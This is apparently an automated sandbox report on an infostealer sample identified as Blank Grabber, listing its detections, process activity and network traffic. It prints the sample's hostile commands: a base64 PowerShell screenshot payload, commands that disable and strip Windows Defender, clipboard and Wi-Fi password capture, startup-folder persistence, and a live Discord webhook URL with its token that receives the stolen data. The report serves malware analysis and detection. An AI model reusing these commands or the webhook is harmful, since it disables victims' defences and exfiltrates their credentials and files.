JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7776, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, ProcessId: 2196, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7664, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3200, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 2896, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: wsapx.exe.7432.2.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}

Multi AV Scanner detection for submitted file

Source: wsapx.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E5D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

110_2_00007FF60E5D901C

Source: wsapx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: wsapx.exe, 00000002.00000002.2671964478.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: wsapx.exe, 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: wsapx.exe, 00000002.00000002.2670829170.00007FFDA34C1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: wsapx.exe, 00000002.00000002.2672233882.00007FFDA57F7000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: wsapx.exe, wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdb source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: wsapx.exe, 00000002.00000002.2671564113.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: wsapx.exe, 00000002.00000002.2671361825.00007FFDA46D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: wsapx.exe, 00000002.00000002.2671081584.00007FFDA4331000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: wsapx.exe, 00000002.00000002.2670348004.00007FFDA3421000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdbhP source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006E.00000000.2528171463.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: wsapx.exe, 00000002.00000002.2670091498.00007FFDA33E1000.00000040.00000001.01000000.00000010.sdmp

Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7C71B83B0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,	0_2_00007FF7C71B92F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,	2_2_00007FF7C71B92F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7C71B83B0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF60E5E46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6288E0 FindFirstFileExA,	110_2_00007FF60E6288E0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF60E5DE21C

Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-5eoty.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 731042User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=0faf40e5cd1f1931bdb8b0465c783544

Source: global traffic

